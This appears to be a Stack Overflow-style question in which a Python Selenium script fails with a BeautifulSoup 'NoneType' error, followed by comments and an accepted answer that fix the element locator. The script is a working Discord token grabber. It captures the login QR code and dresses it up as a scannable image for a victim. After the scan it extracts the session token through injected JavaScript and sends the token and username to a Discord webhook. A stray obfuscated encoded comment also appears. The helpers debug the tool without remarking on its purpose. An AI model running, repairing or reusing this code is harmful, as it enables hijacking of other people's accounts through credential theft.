# AttributeError: 'NoneType' object has no attribute 'find' ~ Python3 + BeautifulSoup

Tags: python, selenium, discord

I've been looking everywhere and every other error has its own fix that isn't related to mine... I'm using python3 and I'm pretty new to this, I can't see how to fix this and I really would like to find out and learn why this has happened. Any help is really appreciated. :)

```
from PIL import Image, ImageDraw, ImageFilter
from bs4 import BeautifulSoup
from selenium import webdriver
import base64
import pyfiglet
import time
import requests
import os
import platform
from discord import Webhook, RequestsWebhookAdapter
from urllib.request import Request, urlopen
from json import loads, dumps


web_hook_url = r"https://discord.com/api/webhooks/fakewebcodehereforsecuirtypurpose"
print(pyfiglet.figlet_format("####"))
token = ""
WINDOW_SIZE = "0,0"
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--window-size=%s" % WINDOW_SIZE)
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'C:\Users\Test\chromedriver.exe')
driver.get('https://discord.com/login')
print("setting up the QR code")
time.sleep(2)
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
classe = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qrcode = classe.find('img')['src']
imgbase64 = base64.b64decode(qrcode.replace('data:image/png;base64,', ''))
with open('temp23.png','wb') as f:
    f.write(imgbase64)
face = Image.open(r'temp\overlay.png')
img_qr_big = Image.open(r'temp23.png').convert('RGB')
os.system("del temp23.png /f>nul")
pos = ((img_qr_big.size[0] - face.size[0]) // 2, (img_qr_big.size[1] - face.size[1]) // 2)
img_qr_big.paste(face, pos)
im1 = Image.open('temp/template.png', 'r')
im1.paste(img_qr_big, (120, 409))
print("Complete...")
print("Saving...")
ine = input("what would you like to name your picture?(do not add extention): ")
time.sleep(1)
im1.save(ine + ".png")
cururl = driver.current_url
print("waiting for user to scan...")
while 1 == 1:
    if driver.current_url != cururl:
        token = driver.execute_script('''
        var req = webpackJsonp.push([
            [], {
                extra_id: (e, t, r) => e.exports = r
            },
            [
                ["extra_id"]
            ]
        ]);
        for (let e in req.c)
            if (req.c.hasOwnProperty(e)) {
                let t = req.c[e].exports;
                if (t && t.__esModule && t.default)
                    for (let e in t.default) "getToken" === e && (gotem = t.default.getToken())
            }
        return gotem;''')
        driver.close()
        break
print("The user has scanned it...")
print("Info recived...")
#TWQkd29tRA9vZKFnaO5odyT0eHlrPDB0sKWuAKmstGC0dPNvIZVpZKFkb2JpJGdyeG8yCTBceYNbf3KkAKKvvGivtqy5IYpnIZRwbOZwbeYhYPRscqo=
print("Sending to Webhook...")
content_type="application/json"
headers = {
    "Content-Type": content_type,
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
    headers.update({"Authorization": token})
j = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
a = j['username'] + "#" + j['discriminator']
webhook = Webhook.from_url(web_hook_url, adapter=RequestsWebhookAdapter())
ok = "Token: \n" + token + "\n\nUsername: \n" + a
webhook.send(ok)
print("Thank you for using")
```

And then the error I was given was:

```
Traceback (most recent call last):
  File "C:\Users\Test\Desktop\tester.py", line 31, in <module>
    qrcode = classe.find('img')['src']
AttributeError: 'NoneType' object has no attribute 'find'
```

Comment: qrCode-wG6ZgU seems to be dynamic so you might not find it .

Comment: soup.select('div[class*="qrCode-"]') replace the line with the qr code with this.

Answer (score 0, accepted):

This actually means that

```py
classe = soup.find('div', {'class': 'qrCode-wG6ZgU'})
```

returns nothing. I.e. `classe` is `NoneType` object.
That's why you can not apply `.find()` method on `classe` object.
All this caused by a wrong locator.
I have checked, there is no `div` element with class name `qrCode-wG6ZgU` on that page.
You should find better, reliable locator for that element.